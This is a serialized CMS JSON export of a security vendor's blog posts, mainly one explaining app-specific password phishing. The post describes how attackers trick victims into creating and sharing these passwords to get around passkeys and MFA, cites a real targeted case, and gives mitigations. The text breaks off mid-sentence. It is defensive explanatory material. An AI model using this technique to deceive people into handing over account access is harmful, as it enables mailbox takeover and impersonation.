[95980],{"type":370},{},{"nodeType":173,"value":81862,"marks":95983,"data":95984},[],{},{"nodeType":250,"data":95986,"content":95987},{},[95988,96017,96026,96035,96044,96053],{"nodeType":254,"data":95989,"content":95990},{},[95991],{"nodeType":178,"data":95992,"content":95993},{},[95994,95997,96004,96007,96014],{"nodeType":173,"value":81875,"marks":95995,"data":95996},[],{},{"nodeType":186,"data":95998,"content":95999},{"uri":81880},[96000],{"nodeType":173,"value":81883,"marks":96001,"data":96003},[96002],{"type":194},{},{"nodeType":173,"value":81888,"marks":96005,"data":96006},[],{},{"nodeType":186,"data":96008,"content":96009},{"uri":81893},[96010],{"nodeType":173,"value":81896,"marks":96011,"data":96013},[96012],{"type":194},{},{"nodeType":173,"value":81901,"marks":96015,"data":96016},[],{},{"nodeType":254,"data":96018,"content":96019},{},[96020],{"nodeType":178,"data":96021,"content":96022},{},[96023],{"nodeType":173,"value":81911,"marks":96024,"data":96025},[],{},{"nodeType":254,"data":96027,"content":96028},{},[96029],{"nodeType":178,"data":96030,"content":96031},{},[96032],{"nodeType":173,"value":81921,"marks":96033,"data":96034},[],{},{"nodeType":254,"data":96036,"content":96037},{},[96038],{"nodeType":178,"data":96039,"content":96040},{},[96041],{"nodeType":173,"value":81931,"marks":96042,"data":96043},[],{},{"nodeType":254,"data":96045,"content":96046},{},[96047],{"nodeType":178,"data":96048,"content":96049},{},[96050],{"nodeType":173,"value":81941,"marks":96051,"data":96052},[],{},{"nodeType":254,"data":96054,"content":96055},{},[96056],{"nodeType":178,"data":96057,"content":96058},{},[96059],{"nodeType":173,"value":81951,"marks":96060,"data":96061},[],{},{"nodeType":312,"data":96063,"content":96066},{"target":96064},{"sys":96065},{"id":81958,"type":317,"linkType":318},[],{"nodeType":235,"data":96068,"content":96069},{},[96070],{"nodeType":173,"value":81964,"marks":96071,"data":96072},[],{},{"nodeType":178,"data":96074,"content":96075},{},[96076],{"nodeType":173,"value":81971,"marks":96077,"data":96078},[],{},{"nodeType":250,"data":96080,"content":96081},{},[96082,96091,96100,96109,96118,96127],{"nodeType":254,"data":96083,"content":96084},{},[96085],{"nodeType":178,"data":96086,"content":96087},{},[96088],{"nodeType":173,"value":81984,"marks":96089,"data":96090},[],{},{"nodeType":254,"data":96092,"content":96093},{},[96094],{"nodeType":178,"data":96095,"content":96096},{},[96097],{"nodeType":173,"value":81994,"marks":96098,"data":96099},[],{},{"nodeType":254,"data":96101,"content":96102},{},[96103],{"nodeType":178,"data":96104,"content":96105},{},[96106],{"nodeType":173,"value":82004,"marks":96107,"data":96108},[],{},{"nodeType":254,"data":96110,"content":96111},{},[96112],{"nodeType":178,"data":96113,"content":96114},{},[96115],{"nodeType":173,"value":82014,"marks":96116,"data":96117},[],{},{"nodeType":254,"data":96119,"content":96120},{},[96121],{"nodeType":178,"data":96122,"content":96123},{},[96124],{"nodeType":173,"value":82024,"marks":96125,"data":96126},[],{},{"nodeType":254,"data":96128,"content":96129},{},[96130],{"nodeType":178,"data":96131,"content":96132},{},[96133],{"nodeType":173,"value":82034,"marks":96134,"data":96135},[],{},{"nodeType":178,"data":96137,"content":96138},{},[96139],{"nodeType":173,"value":82041,"marks":96140,"data":96141},[],{},{"nodeType":178,"data":96143,"content":96144},{},[96145],{"nodeType":173,"value":82048,"marks":96146,"data":96147},[],{},{"nodeType":178,"data":96149,"content":96150},{},[96151],{"nodeType":173,"value":82055,"marks":96152,"data":96153},[],{},{"nodeType":312,"data":96155,"content":96158},{"target":96156},{"sys":96157},{"id":82062,"type":317,"linkType":318},[],{"nodeType":178,"data":96160,"content":96161},{},[96162],{"nodeType":173,"value":82068,"marks":96163,"data":96164},[],{},{"nodeType":235,"data":96166,"content":96167},{},[96168],{"nodeType":173,"value":82075,"marks":96169,"data":96170},[],{},{"nodeType":178,"data":96172,"content":96173},{},[96174],{"nodeType":173,"value":82082,"marks":96175,"data":96176},[],{},{"nodeType":312,"data":96178,"content":96181},{"target":96179},{"sys":96180},{"id":82089,"type":317,"linkType":318},[],{"nodeType":235,"data":96183,"content":96184},{},[96185],{"nodeType":173,"value":82095,"marks":96186,"data":96187},[],{},{"nodeType":178,"data":96189,"content":96190},{},[96191],{"nodeType":173,"value":82102,"marks":96192,"data":96193},[],{},{"nodeType":178,"data":96195,"content":96196},{},[96197],{"nodeType":173,"value":82109,"marks":96198,"data":96199},[],{},{"nodeType":312,"data":96201,"content":96204},{"target":96202},{"sys":96203},{"id":82116,"type":317,"linkType":318},[],{"nodeType":178,"data":96206,"content":96207},{},[96208,96211,96218],{"nodeType":173,"value":82122,"marks":96209,"data":96210},[],{},{"nodeType":186,"data":96212,"content":96213},{"uri":74370},[96214],{"nodeType":173,"value":82129,"marks":96215,"data":96217},[96216],{"type":194},{},{"nodeType":173,"value":82134,"marks":96219,"data":96220},[],{},{"nodeType":235,"data":96222,"content":96223},{},[96224],{"nodeType":173,"value":82141,"marks":96225,"data":96226},[],{},{"nodeType":178,"data":96228,"content":96229},{},[96230],{"nodeType":173,"value":82148,"marks":96231,"data":96232},[],{},{"nodeType":250,"data":96234,"content":96235},{},[96236,96245,96254,96263],{"nodeType":254,"data":96237,"content":96238},{},[96239],{"nodeType":178,"data":96240,"content":96241},{},[96242],{"nodeType":173,"value":82161,"marks":96243,"data":96244},[],{},{"nodeType":254,"data":96246,"content":96247},{},[96248],{"nodeType":178,"data":96249,"content":96250},{},[96251],{"nodeType":173,"value":82171,"marks":96252,"data":96253},[],{},{"nodeType":254,"data":96255,"content":96256},{},[96257],{"nodeType":178,"data":96258,"content":96259},{},[96260],{"nodeType":173,"value":82181,"marks":96261,"data":96262},[],{},{"nodeType":254,"data":96264,"content":96265},{},[96266],{"nodeType":178,"data":96267,"content":96268},{},[96269],{"nodeType":173,"value":82191,"marks":96270,"data":96271},[],{},{"nodeType":312,"data":96273,"content":96276},{"target":96274},{"sys":96275},{"id":82198,"type":317,"linkType":318},[],{"nodeType":231,"data":96278,"content":96279},{},[],{"nodeType":169,"data":96281,"content":96282},{},[96283],{"nodeType":173,"value":82207,"marks":96284,"data":96286},[96285],{"type":370},{},{"nodeType":178,"data":96288,"content":96289},{},[96290,96293,96300,96303],{"nodeType":173,"value":82215,"marks":96291,"data":96292},[],{},{"nodeType":186,"data":96294,"content":96295},{"uri":82220},[96296],{"nodeType":173,"value":82223,"marks":96297,"data":96299},[96298],{"type":194},{},{"nodeType":173,"value":2936,"marks":96301,"data":96302},[],{},{"nodeType":173,"value":82231,"marks":96304,"data":96306},[96305],{"type":370},{},{"nodeType":231,"data":96308,"content":96309},{},[],{"nodeType":169,"data":96311,"content":96312},{},[96313],{"nodeType":173,"value":2824,"marks":96314,"data":96316},[96315],{"type":370},{},{"nodeType":178,"data":96318,"content":96319},{},[96320],{"nodeType":173,"value":70343,"marks":96321,"data":96322},[],{},{"nodeType":178,"data":96324,"content":96325},{},[96326],{"nodeType":173,"value":70350,"marks":96327,"data":96328},[],{},{"nodeType":178,"data":96330,"content":96331},{},[96332,96335,96342],{"nodeType":173,"value":61741,"marks":96333,"data":96334},[],{},{"nodeType":186,"data":96336,"content":96337},{"uri":473},[96338],{"nodeType":173,"value":70364,"marks":96339,"data":96341},[96340],{"type":194},{},{"nodeType":173,"value":37,"marks":96343,"data":96344},[],{},{"entries":96346},{"hyperlink":96347,"inline":96348,"block":96349},[],[],[96350,96358,96362,96368,96393,96401,96408,96413,96420,96426,96432],{"sys":96351,"__typename":5345,"title":96352,"caption":96353,"layoutMode":118,"file":96354},{"id":81358},"Detections feature blog image 1","A version of NOW that sadly does not exist in the wild.",{"url":96355,"width":96356,"height":96357},"https://images.ctfassets.net/y1cdw1ablpvd/2jy8iOjUaE3L329TI67enQ/c47f600f8dc32c6358565791f4898443/image3.png",916,594,{"sys":96359,"__typename":5434,"title":96360,"arcadeDemoUrl":96361,"playText":5437},{"id":81412},"Detection walk-through 2","https://demo.arcade.software/gnOatHxEHaDs9SFRiDHY?embed",{"sys":96363,"__typename":5345,"title":96364,"caption":78133,"layoutMode":118,"file":96365},{"id":81450},"Detections Feature Blog: Attack Evolution",{"url":96366,"width":5358,"height":96367},"https://images.ctfassets.net/y1cdw1ablpvd/HzZeEBTpsqO575ni4j8oX/ccbc8ecf1b7dadfd9f2ec15f20399760/image4.png",815,{"sys":96369,"__typename":5311,"content":96370,"name":96392,"title":118},{"id":81521},{"json":96371},{"data":96372,"content":96373,"nodeType":165},{},[96374],{"data":96375,"content":96376,"nodeType":178},{},[96377,96381,96388],{"data":96378,"marks":96379,"value":96380,"nodeType":173},{},[],"And even if your users are using phishing-resistant login methods, attackers are routinely using ",{"data":96382,"content":96383,"nodeType":186},{"uri":49783},[96384],{"data":96385,"marks":96386,"value":39789,"nodeType":173},{},[96387],{"type":194},{"data":96389,"marks":96390,"value":96391,"nodeType":173},{},[]," to take advantage of less secure backup login methods — which they’re achieving using Adversary-in-the-Middle phishing kits that are the standard choice for attackers today.","Detection blog: insight box",{"sys":96394,"__typename":5345,"title":96395,"caption":96396,"layoutMode":118,"file":96397},{"id":81675},"Detections blog: Email and network layer identity tools are looking from the outside-in at attacks that happen in the victim’s web browser.","Email and network layer identity tools are looking from the outside-in at attacks that happen in the victim’s web browser.",{"url":96398,"width":96399,"height":96400},"https://images.ctfassets.net/y1cdw1ablpvd/1488clWVU9FbuCVLfK4kcW/c014d62cdba4a6bc9312a7b1ff36b469/image9.png",1694,884,{"sys":96402,"__typename":5345,"title":96403,"caption":89499,"layoutMode":118,"file":96404},{"id":81841},"Detections blog: Being in the browser gives you unrivalled visibility of phishing page activity and user behavior.",{"url":96405,"width":96406,"height":96407},"https://images.ctfassets.net/y1cdw1ablpvd/4ogsAA3hGcMII18MwTYn6T/6fdf3ef0e6e59ecf412fd0748ba24145/Screenshot_2025-04-29_at_11.35.47.png",1942,924,{"sys":96409,"__typename":5345,"title":96410,"caption":96410,"layoutMode":118,"file":96411},{"id":81958},"Using Push, you can get a detailed timeline of what occurred in the browser during a security incident, including a screenshot of the phishing site and a view into all the impacted accounts.",{"url":96412,"width":27941,"height":5358},"https://images.ctfassets.net/y1cdw1ablpvd/aRWXKrYsTBsWNyLZD6xnq/19da00363042e2ec3b065cce711022da/image6.png",{"sys":96414,"__typename":5345,"title":96415,"caption":96415,"layoutMode":118,"file":96416},{"id":82062},"Timeline detail from a detection, from link source to whether credentials were entered and a session was successfully created.",{"url":96417,"width":96418,"height":96419},"https://images.ctfassets.net/y1cdw1ablpvd/b7EMaJoZDdrMnbUYpNJYt/3f18f47eec73f3bb82fd453694179215/image1.png",1442,1562,{"sys":96421,"__typename":5345,"title":96422,"caption":96422,"layoutMode":118,"file":96423},{"id":82089},"Screenshot detail from a detection.",{"url":96424,"width":5358,"height":96425},"https://images.ctfassets.net/y1cdw1ablpvd/16pqmMfgYn5t66uCSAN4U9/f1c9ff29c31a14c2ea302455876776bf/image7.png",551,{"sys":96427,"__typename":5345,"title":96428,"caption":96428,"layoutMode":118,"file":96429},{"id":82116},"Blast radius detail from a detection showing login methods, compromised apps and at-risk accounts. ",{"url":96430,"width":5358,"height":96431},"https://images.ctfassets.net/y1cdw1ablpvd/78sUsmdsMFzElZjekjcn1R/31f9c1b5d9d04e94236d7f9888924609/image2.png",639,{"sys":96433,"__typename":5345,"title":96434,"caption":96434,"layoutMode":118,"file":96435},{"id":82198},"urlscan.io enrichment on a detection",{"url":96436,"width":5358,"height":96437},"https://images.ctfassets.net/y1cdw1ablpvd/32AfP4MM4lIuS8rTsuEXjj/65582616381c6f3f522101e1fb81f726/image5.png",1354,"content:blog:introducing-push-detections.json","blog/introducing-push-detections.json","blog/introducing-push-detections",{"_path":96442,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":96443,"ogImage":118,"summary":96445,"title":61754,"subtitle":118,"metaTitle":96456,"synopsis":61755,"hashTags":118,"publishedDate":61756,"slug":61757,"tagsCollection":96457,"relatedBlogPostsCollection":96463,"authorsCollection":98355,"content":98359,"_id":98989,"_type":5439,"_source":5440,"_file":98990,"_stem":98991,"_extension":5439},"/blog/mfa-downgrade-attacks",{"id":61098,"publishedAt":96444},"2025-07-24T12:34:44.666Z",{"json":96446},{"data":96447,"content":96448,"nodeType":165},{},[96449],{"data":96450,"content":96451,"nodeType":178},{},[96452],{"data":96453,"marks":96454,"value":96455,"nodeType":173},{},[],"MFA downgrade (also known as auth downgrade) is an increasingly common technique used by attackers to bypass phishing-resistant authentication methods registered to an account — simply by selecting an alternative (phishable) method. ","How attackers are getting around phishing-resistant auth",{"items":96458},[96459,96461],{"sys":96460,"name":509},{"id":508},{"sys":96462,"name":505},{"id":504},{"items":96464},[96465,97139,97692],{"__typename":1528,"sys":96466,"content":96468,"title":97126,"synopsis":97127,"hashTags":118,"publishedDate":93522,"slug":97128,"tagsCollection":97129,"authorsCollection":97135},{"id":96467},"3c9KMXYa1A9rOg61Kmg7j4",{"json":96469},{"nodeType":165,"data":96470,"content":96471},{},[96472,96515,96522,96529,96559,96566,96569,96577,96597,96603,96610,96617,96624,96627,96635,96642,96662,96669,96675,96678,96686,96693,96761,96768,96771,96779,96786,96793,96894,96901,96904,96911,96940,96947,96950,96957,96964,96984,96991,96994,97001,97008,97014,97021,97027,97034,97077,97084,97091,97094,97102,97109],{"nodeType":178,"data":96473,"content":96474},{},[96475,96479,96487,96490,96499,96502,96511],{"nodeType":173,"value":96476,"marks":96477,"data":96478},"App-Specific Passwords (ASPs) are a way for users to access applications that do not support MFA or are otherwise incompatible with a platform’s standard login workflows. They are intended to enable a user to login to “legacy” (typically desktop) applications that do not support modern authentication (e.g. OAuth 2.0). For example, you might use this feature to allow a third-party mail client access to an email account by logging in with your ",[],{},{"nodeType":186,"data":96480,"content":96482},{"uri":96481},"https://support.microsoft.com/en-gb/account-billing/how-to-get-and-use-app-passwords-5896ed9b-4263-e681-128a-a6f2979a7944",[96483],{"nodeType":173,"value":1255,"marks":96484,"data":96486},[96485],{"type":194},{},{"nodeType":173,"value":2936,"marks":96488,"data":96489},[],{},{"nodeType":186,"data":96491,"content":96493},{"uri":96492},"https://support.google.com/accounts/answer/185833?hl=en",[96494],{"nodeType":173,"value":96495,"marks":96496,"data":96498},"Google",[96497],{"type":194},{},{"nodeType":173,"value":3949,"marks":96500,"data":96501},[],{},{"nodeType":186,"data":96503,"content":96505},{"uri":96504},"https://support.apple.com/en-us/102654",[96506],{"nodeType":173,"value":96507,"marks":96508,"data":96510},"Apple",[96509],{"type":194},{},{"nodeType":173,"value":96512,"marks":96513,"data":96514}," account. ",[],{},{"nodeType":178,"data":96516,"content":96517},{},[96518],{"nodeType":173,"value":96519,"marks":96520,"data":96521},"The logic behind this is that it is comparatively more secure than giving your critical IdP password to less secure apps — likely due to the volume of accounts compromised as a result of third-party breaches. It also means that if someone phishes your primary account password that normally has a second factor, that specific password can’t be used without the second factor. ",[],{},{"nodeType":178,"data":96523,"content":96524},{},[96525],{"nodeType":173,"value":96526,"marks":96527,"data":96528},"However, if an ASP is acquired by an attacker, it can be used to login to the target app — circumventing phishing-resistant authentication methods such as passkeys, and bypassing MFA checks. It effectively provides a method of sidestepping your preferred login method. So for example, if you're an organization that uses a passwordless login to access your Google Workspace account and has disabled secondary login methods (the gold standard in terms of secure authentication), an ASP gives attackers a way around this. ",[],{},{"nodeType":178,"data":96530,"content":96531},{},[96532,96536,96544,96548,96555],{"nodeType":173,"value":96533,"marks":96534,"data":96535},"With recent evidence of exploitation in the wild in the form of ",[],{},{"nodeType":186,"data":96537,"content":96538},{"uri":61610},[96539],{"nodeType":173,"value":96540,"marks":96541,"data":96543},"app-specific password phishing",[96542],{"type":194},{},{"nodeType":173,"value":96545,"marks":96546,"data":96547},", our latest addition to the ",[],{},{"nodeType":186,"data":96549,"content":96550},{"uri":88239},[96551],{"nodeType":173,"value":88245,"marks":96552,"data":96554},[96553],{"type":194},{},{"nodeType":173,"value":96556,"marks":96557,"data":96558},", it’s important that security teams are aware of this technique, what the risks are, and how to defend against it.  ",[],{},{"nodeType":178,"data":96560,"content":96561},{},[96562],{"nodeType":173,"value":96563,"marks":96564,"data":96565},"Let’s take a quick look at how this actually works before we dive into the malicious use cases. ",[],{},{"nodeType":231,"data":96567,"content":96568},{},[],{"nodeType":169,"data":96570,"content":96571},{},[96572],{"nodeType":173,"value":96573,"marks":96574,"data":96576},"ASPs 101",[96575],{"type":370},{},{"nodeType":178,"data":96578,"content":96579},{},[96580,96584,96593],{"nodeType":173,"value":96581,"marks":96582,"data":96583},"ASPs are pretty straightforward. You log into your chosen account (e.g. Microsoft, Google, or Apple) and navigate to the ASP creation page — in Google’s case ",[],{},{"nodeType":186,"data":96585,"content":96587},{"uri":96586},"http://myaccount.google.com/apppasswords",[96588],{"nodeType":173,"value":96589,"marks":96590,"data":96592},"myaccount.google.com/apppasswords",[96591],{"type":194},{},{"nodeType":173,"value":96594,"marks":96595,"data":96596},". Then, it’s as simple as typing in a name and hitting the “create” button. ",[],{},{"nodeType":312,"data":96598,"content":96602},{"target":96599},{"sys":96600},{"id":96601,"type":317,"linkType":318},"76qanYHiwrSyrkwlYnCuCZ",[],{"nodeType":178,"data":96604,"content":96605},{},[96606],{"nodeType":173,"value":96607,"marks":96608,"data":96609},"This isn’t actually app-specific in the sense that it’s tied to a specific app at the point of creation, but the idea is that you’d create a unique password for each app you want to log into. ",[],{},{"nodeType":178,"data":96611,"content":96612},{},[96613],{"nodeType":173,"value":96614,"marks":96615,"data":96616},"From this point, you can use the password along with your email address to log into apps normally. It’s important to note that this isn’t available for every app, but is specifically intended for things like third-party email clients. By logging in with an ASP, you are also granting specific permissions to the app. So in the case of Google, you can view, send and delete emails, access contacts, and access the calendar, but you can’t add mail rules, or access other G-Suite apps like Google Drive.   ",[],{},{"nodeType":178,"data":96618,"content":96619},{},[96620],{"nodeType":173,"value":96621,"marks":96622,"data":96623},"It’s important to note that you can’t use this as a substitute for SSO — e.g. you can’t authenticate to a third-party app like Slack using your Google account with an ASP, so the risk is somewhat limited to basic email functionality. That said, email access gives an attacker plenty to work with, and it’s enough to move laterally to other accounts through password and MFA resets — so there’s plenty of scope to expand the blast radius with a little extra legwork.  ",[],{},{"nodeType":231,"data":96625,"content":96626},{},[],{"nodeType":169,"data":96628,"content":96629},{},[96630],{"nodeType":173,"value":96631,"marks":96632,"data":96634},"How ASP phishing works",[96633],{"type":370},{},{"nodeType":178,"data":96636,"content":96637},{},[96638],{"nodeType":173,"value":96639,"marks":96640,"data":96641},"While logging in with an ASP doesn’t grant an attacker full access to the account, there’s still a lot that an attacker can do with access to email, contact, and calendar information. It’s certainly enough to be used in social engineering attacks impersonating the compromised user, as well as generally monitoring email activity. ",[],{},{"nodeType":178,"data":96643,"content":96644},{},[96645,96649,96658],{"nodeType":173,"value":96646,"marks":96647,"data":96648},"An ",[],{},{"nodeType":186,"data":96650,"content":96652},{"uri":96651},"https://cloud.google.com/blog/topics/threat-intelligence/creative-phishing-academics-critics-of-russia",[96653],{"nodeType":173,"value":96654,"marks":96655,"data":96657},"example of this was recently disclosed",[96656],{"type":194},{},{"nodeType":173,"value":96659,"marks":96660,"data":96661}," where an expert on Russian information operations was targeted with a sophisticated and personalized social engineering attack, where the attacker was able to establish persistent access to the victim’s mailbox using ASPs by logging into a mail client. ",[],{},{"nodeType":178,"data":96663,"content":96664},{},[96665],{"nodeType":173,"value":96666,"marks":96667,"data":96668},"This involved a sophisticated lure impersonating the US Department of State instructing the victim on how to create and share an ASP with the attacker, granting access to their Google mailbox. ",[],{},{"nodeType":312,"data":96670,"content":96674},{"target":96671},{"sys":96672},{"id":96673,"type":317,"linkType":318},"Lt93bzQNcEzg2OoCSrgED",[],{"nodeType":231,"data":96676,"content":96677},{},[],{"nodeType":169,"data":96679,"content":96680},{},[96681],{"nodeType":173,"value":96682,"marks":96683,"data":96685},"Benefits and limitations of ASP phishing",[96684],{"type":370},{},{"nodeType":178,"data":96687,"content":96688},{},[96689],{"nodeType":173,"value":96690,"marks":96691,"data":96692},"This approach has a few advantages over conventional credential phishing:",[],{},{"nodeType":250,"data":96694,"content":96695},{},[96696,96706,96716,96726],{"nodeType":254,"data":96697,"content":96698},{},[96699],{"nodeType":178,"data":96700,"content":96701},{},[96702],{"nodeType":173,"value":96703,"marks":96704,"data":96705},"It completely sidesteps otherwise phishing-resistant login methods such as passkeys, and by design does not require MFA. ",[],{},{"nodeType":254,"data":96707,"content":96708},{},[96709],{"nodeType":178,"data":96710,"content":96711},{},[96712],{"nodeType":173,"value":96713,"marks":96714,"data":96715},"This kind of attack also naturally doesn’t trigger many typical phishing or malware-based detections. As it’s pure social engineering, there is no malicious link, page, or file to analyse. ",[],{},{"nodeType":254,"data":96717,"content":96718},{},[96719],{"nodeType":178,"data":96720,"content":96721},{},[96722],{"nodeType":173,"value":96723,"marks":96724,"data":96725},"For less technically aware victims, this might present a more effective alternative to traditional credential phishing — awareness training won’t extend to this kind of use case. ",[],{},{"nodeType":254,"data":96727,"content":96728},{},[96729],{"nodeType":178,"data":96730,"content":96731},{},[96732,96736,96745,96749,96758],{"nodeType":173,"value":96733,"marks":96734,"data":96735},"While generic security alert emails are generated when an app password is created, visibility of actual login events is limited. For example, ",[],{},{"nodeType":186,"data":96737,"content":96739},{"uri":96738},"https://issuetracker.google.com/issues/298128558",[96740],{"nodeType":173,"value":96741,"marks":96742,"data":96744},"Google provides no logs for ASP creation and usage",[96743],{"type":194},{},{"nodeType":173,"value":96746,"marks":96747,"data":96748},", while ",[],{},{"nodeType":186,"data":96750,"content":96752},{"uri":96751},"https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords",[96753],{"nodeType":173,"value":96754,"marks":96755,"data":96757},"Microsoft provides no on-premises logging or auditing capability",[96756],{"type":194},{},{"nodeType":173,"value":481,"marks":96759,"data":96760},[],{},{"nodeType":178,"data":96762,"content":96763},{},[96764],{"nodeType":173,"value":96765,"marks":96766,"data":96767},"However, there are also limitations that will probably see this technique remain a niche choice for attackers. Namely, the complexity of the attack doesn’t necessarily map to the payoff, where it doesn’t result in full account compromise and the permissions/scopes of an ASP login are limited. This means that it lends itself to multi-step attacks, most likely as part of more targeted and stealthy attacks against specific individuals (as seen in the example above). For this reason, attackers are likely to prioritize other methods when they are available. ",[],{},{"nodeType":231,"data":96769,"content":96770},{},[],{"nodeType":169,"data":96772,"content":96773},{},[96774],{"nodeType":173,"value":96775,"marks":96776,"data":96778},"Comparing ASPs with other auth bypasses",[96777],{"type":370},{},{"nodeType":178,"data":96780,"content":96781},{},[96782],{"nodeType":173,"value":96783,"marks":96784,"data":96785},"ASP phishing is part of a growing trend of phishing techniques focused on bypassing conventional authentication. With more organizations investing in phishing-resistant authentication methods like passkeys/WebAuthn and using SSO as standard, attackers are increasingly looking to circumvent the standard login process entirely. ",[],{},{"nodeType":178,"data":96787,"content":96788},{},[96789],{"nodeType":173,"value":96790,"marks":96791,"data":96792},"Similar phishing approaches designed to circumvent an account’s authentication controls include:",[],{},{"nodeType":250,"data":96794,"content":96795},{},[96796,96817,96846,96865],{"nodeType":254,"data":96797,"content":96798},{},[96799],{"nodeType":178,"data":96800,"content":96801},{},[96802,96806,96813],{"nodeType":173,"value":96803,"marks":96804,"data":96805},"Phishing for ",[],{},{"nodeType":186,"data":96807,"content":96808},{"uri":59347},[96809],{"nodeType":173,"value":59350,"marks":96810,"data":96812},[96811],{"type":194},{},{"nodeType":173,"value":96814,"marks":96815,"data":96816},", which has the advantage of granting full access to the account, and persisting even if the account password is changed (in contrast, Google resets all ASPs if the account password is changed). ",[],{},{"nodeType":254,"data":96818,"content":96819},{},[96820],{"nodeType":178,"data":96821,"content":96822},{},[96823,96826,96833,96836,96843],{"nodeType":173,"value":37,"marks":96824,"data":96825},[],{},{"nodeType":186,"data":96827,"content":96828},{"uri":19838},[96829],{"nodeType":173,"value":39940,"marks":96830,"data":96832},[96831],{"type":194},{},{"nodeType":173,"value":61650,"marks":96834,"data":96835},[],{},{"nodeType":186,"data":96837,"content":96838},{"uri":61655},[96839],{"nodeType":173,"value":61658,"marks":96840,"data":96842},[96841],{"type":194},{},{"nodeType":173,"value":61663,"marks":96844,"data":96845},[],{},{"nodeType":254,"data":96847,"content":96848},{},[96849],{"nodeType":178,"data":96850,"content":96851},{},[96852,96855,96862],{"nodeType":173,"value":37,"marks":96853,"data":96854},[],{},{"nodeType":186,"data":96856,"content":96857},{"uri":9275},[96858],{"nodeType":173,"value":9278,"marks":96859,"data":96861},[96860],{"type":194},{},{"nodeType":173,"value":61683,"marks":96863,"data":96864},[],{},{"nodeType":254,"data":96866,"content":96867},{},[96868],{"nodeType":178,"data":96869,"content":96870},{},[96871,96874,96881,96884,96891],{"nodeType":173,"value":37,"marks":96872,"data":96873},[],{},{"nodeType":186,"data":96875,"content":96876},{"uri":61697},[96877],{"nodeType":173,"value":57951,"marks":96878,"data":96880},[96879],{"type":194},{},{"nodeType":173,"value":61704,"marks":96882,"data":96883},[],{},{"nodeType":186,"data":96885,"content":96886},{"uri":61709},[96887],{"nodeType":173,"value":61712,"marks":96888,"data":96890},[96889],{"type":194},{},{"nodeType":173,"value":61717,"marks":96892,"data":96893},[],{},{"nodeType":178,"data":96895,"content":96896},{},[96897],{"nodeType":173,"value":96898,"marks":96899,"data":96900},"Clearly, ASP phishing is part of a much bigger trend in which attackers are moving away from conventional phishing tactics in order to sidestep the authentication process. ",[],{},{"nodeType":231,"data":96902,"content":96903},{},[],{"nodeType":169,"data":96905,"content":96906},{},[96907],{"nodeType":173,"value":40632,"marks":96908,"data":96910},[96909],{"type":370},{},{"nodeType":178,"data":96912,"content":96913},{},[96914,96918,96925,96929,96936],{"nodeType":173,"value":96915,"marks":96916,"data":96917},"There is a common misconception that adopting SSO-based logins, with a locked-down IdP account is an identity security silver bullet. The reality is that identity, authentication, and authorization is a complex and little-understood space. Even with SSO, there are ",[],{},{"nodeType":186,"data":96919,"content":96920},{"uri":832},[96921],{"nodeType":173,"value":835,"marks":96922,"data":96924},[96923],{"type":194},{},{"nodeType":173,"value":96926,"marks":96927,"data":96928},", backup login and MFA methods susceptible to ",[],{},{"nodeType":186,"data":96930,"content":96931},{"uri":61157},[96932],{"nodeType":173,"value":39789,"marks":96933,"data":96935},[96934],{"type":194},{},{"nodeType":173,"value":96937,"marks":96938,"data":96939},", and as we’ve seen with ASP phishing and similar techniques, many, many more ways to compromise an identity. ",[],{},{"nodeType":178,"data":96941,"content":96942},{},[96943],{"nodeType":173,"value":96944,"marks":96945,"data":96946},"Security teams need to approach the complexity of identity security with their eyes open to reality. Without a full picture of how your various workforce identities can be accessed by your users, exploitable gaps will inevitably be left for attackers to take advantage of. ",[],{},{"nodeType":231,"data":96948,"content":96949},{},[],{"nodeType":169,"data":96951,"content":96952},{},[96953],{"nodeType":173,"value":8299,"marks":96954,"data":96956},[96955],{"type":370},{},{"nodeType":178,"data":96958,"content":96959},{},[96960],{"nodeType":173,"value":96961,"marks":96962,"data":96963},"Given the logging challenges relating to ASP creation and use, the best option is to prevent ASPs from being created in the first place. ",[],{},{"nodeType":178,"data":96965,"content":96966},{},[96967,96971,96980],{"nodeType":173,"value":96968,"marks":96969,"data":96970},"By default, users can't create app passwords in Microsoft. The app passwords feature must be enabled before users can use them. To check if this option is turned on, ",[],{},{"nodeType":186,"data":96972,"content":96974},{"uri":96973},"https://learn.microsoft.com/en-gb/entra/identity/authentication/howto-mfa-app-passwords",[96975],{"nodeType":173,"value":96976,"marks":96977,"data":96979},"you can see and toggle the setting in Entra",[96978],{"type":194},{},{"nodeType":173,"value":96981,"marks":96982,"data":96983}," by browsing to Conditional Access > Named locations > Configure MFA trusted IPs > Multifactor authentication page > Allow users to create app passwords to sign in to non-browser apps option.",[],{},{"nodeType":178,"data":96985,"content":96986},{},[96987],{"nodeType":173,"value":96988,"marks":96989,"data":96990},"Apple and Google ASPs can’t be disabled in the same way… but don’t worry. That’s where Push comes in. ",[],{},{"nodeType":231,"data":96992,"content":96993},{},[],{"nodeType":169,"data":96995,"content":96996},{},[96997],{"nodeType":173,"value":1422,"marks":96998,"data":97000},[96999],{"type":370},{},{"nodeType":178,"data":97002,"content":97003},{},[97004],{"nodeType":173,"value":97005,"marks":97006,"data":97007},"We’re working on adding visibility for ASPs being created, but users of our browser-based security platform can use existing features to prevent ASP phishing. Realistically, there’s no good reason for the average user to be configuring ASPs. So, you can use our URL blocking feature to prevent employees from accessing the pages for ASP creation on relevant apps. ",[],{},{"nodeType":312,"data":97009,"content":97013},{"target":97010},{"sys":97011},{"id":97012,"type":317,"linkType":318},"5i0Ou5a27XOt7gxJo9cu0P",[],{"nodeType":178,"data":97015,"content":97016},{},[97017],{"nodeType":173,"value":97018,"marks":97019,"data":97020},"When a user tries to access the page, they’ll see this message instead and a security alert will be generated. ",[],{},{"nodeType":312,"data":97022,"content":97026},{"target":97023},{"sys":97024},{"id":97025,"type":317,"linkType":318},"7nsimiWtv5XOuKkE9wL3A3",[],{"nodeType":178,"data":97028,"content":97029},{},[97030],{"nodeType":173,"value":97031,"marks":97032,"data":97033},"It is recommended that you block the following URLs for Google and 